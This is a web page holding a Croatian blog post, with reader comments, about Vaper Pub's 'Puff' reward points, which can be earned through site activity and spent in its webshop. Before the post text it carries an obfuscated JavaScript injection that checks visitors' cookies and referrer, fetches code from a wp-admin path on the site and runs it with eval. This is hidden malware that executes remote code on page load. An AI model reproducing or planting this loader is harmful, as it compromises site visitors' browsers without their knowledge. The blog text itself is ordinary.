;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Prva Hrvatska virtualna kripto valuta

Plaćanje virtualnom “kripto” valutom

Bit ćemo bahati i nadobudni pa ćemo “Puff” Vaper Pub društvene mreže samoinicijativno prozvati Prvom Hrvatskom Virtualnom Kripto Valutom Sve Velikim Slovima Ne Znam Zašto, ali neka.

Možda bi trebao malo proučiti što točno kripto valuta je po nekakvoj dubljoj definiciji od one koju ja znam – da je to “digitalna” i “virtualna” valuta. Ako netko ima što pametno reći na tu temu – slobodno komentirajte.

Uglavnom…

Je li Puff digitalna i virtualna – je.

Ima li Puff konverziju, tečaj – ima.

Dal se za nju može nešto kupiti – može.

Onda je to valjda to?

No šalu na stranu, što je točno Puff. Puff je sistem bodovanja, nagrađivanja korisnika za njihov angažman na Vaper Pub društvenoj mreži. Puff je tu kao dodatni poticaj i motiv da koristite Vaper Pub društvenu mrežu te kao izvor zabave za one koji su kao ja – vole rješavati questove, skupljati nešto, imati značke, biti bolji od drugih.

Jer realno, iako sam admin stranice i mogu si dodijeliti koliko god želim puffova, koliko god želim “značaka” – nisam to učinio iz jednostavnog razloga jer bi mi bilo dosadno :D a ovako mi je zanimljivo, al to sam ja.

Zanimljivo mi je smišljati i kreirati ove zadatke :D jer inače ih ne bi kreirao baš toliko, i smišljao još nove xD

No opet ja ošo u digresiju.

Dakle…

Interakcijom sa Vaper Pub društvenom mrežom skupljate Puff bodove. Napišete objavu, dobijete bod, komentirate objavu, dobijete bod, stavite profilnu sliku, dobijete više bodova i tako dalje.

Tu postoje i razni limiti koji su postavljeni ne možda obavezno kako bi smanjili broj dodijeljenih bodova nego da bi spriječili spam jer sam poprilično siguran da bi se sjetio netko pametan i zaspamao stranicu sa milion glupih objava a onda tražio pravdu uvjeravajući me kako sam ja loš i zločest jer je on napravio što se tražilo od njega…iako je besmisleno i namjerno izigrava sustav.

No…

Ajmo realno, postavili smo to da se zabavimo, da bude zanimljivije pa čak ako vam i nije zanimljivo da imate nekakve koristi od toga – nemojte molim vas to zloupotrijebiti.

Vrlo vjerojatno će se desiti pokoji fulanac, krivo podešen zadatak gdje će vam možda masu bodova biti dodijeljeno bez zasluge i onako kako je predviđeno. To prvenstveno nije fer prema drugima, ako ćete inzistirati na tome da se bodovi zadrže tada je to zloupotreba naše dobre volje i na kraju krajeva poanta Vaper Pub društvene mreže nije prvenstveno zgrtanje Puffova već komunikacija i druženje.

Dakle tu pričam o isključivo nezasluženim bodovima koje će možda netko dobiti jer je sustav krivo konfiguriran unatoč danima provedenim u detaljnoj provjeri svega.

Ako netko dobije primjerice 3000 bodova za 1000 objava u prvih par dana – tu očito nešto nije uredu jer nitko živ ne radi 1000 objava u par dana osim ako nije spammer i ne zloupotrebljava sustav.

Zato su neki zadaci limitirani na to da se gleda samo prvi u danu – primjerice ako imate 5 objava, računa se samo prva u danu – ostale ne.

No unatoč tome se može desiti svašta – to ćemo tek vidjeti.

Kako koristiti Puff bodove i koliko oni vrijede?

Ugrubo – 5 puff bodova je 1 kn. Kada skupite dovoljan broj Puff bodova možete ih iskoristiti na webshopu Vaper Pub društvene mreže i platiti s njima proizvod koji ste odabrali.

Možda se ovako na prvu čini “ma nikad neću skupit” ili slično, al ne zaboravite da je svaka posjeta jedan bod i dugoročno ćete skupiti sukladno svojoj aktivnosti na stranici.

Par dodatnih sitnica, možda više sažetih, možete pročitati ovdje > Kripto Valuta Puff
Što se točno nagrađuje Puff bodovima pogledajte ovdje:
Način stjecanja kripto valute Puff
Kripto valuta Puff kao nagrada za angažman

Choose your Reaction!
  • Da, Ok su Puff-ovi :) Što se tiče moguće zloupotrebe systema da bi se zaradilo više Puff-ova, odmah da se ogradim. Ja jednostavno tako fu(n)kcioniram :P Od davnina poznat kao spamer, to je jače od mene. Pa ako se slučajno i dogodi da zbog toga iskoči gdje koji Puff viška, odmah da se ogradim. Nije mi namjera. Jednostavno mi oduzmite onih 250 Puffova, samo me nemoj banati zbog spama ;) BTW, pokazao sam i sinoć na chatu da sam fer, s upitom i čuđenjem otkud mi tih dodatnih 50 Puff-ova u tom trenu.

  • ja bum čekao da skupim bar za 3-4 bočice, čisto da vama uštedim na poštarini ak niš :) glupo mi je jednu po jednu “kupovat” za bodove :)

  • Ovo je odlican dodatak za aktivniji angazman. Osobno mi je probudilo interes i ponukalo da ne budem lurker – questovi su super :-)

Leave a Comment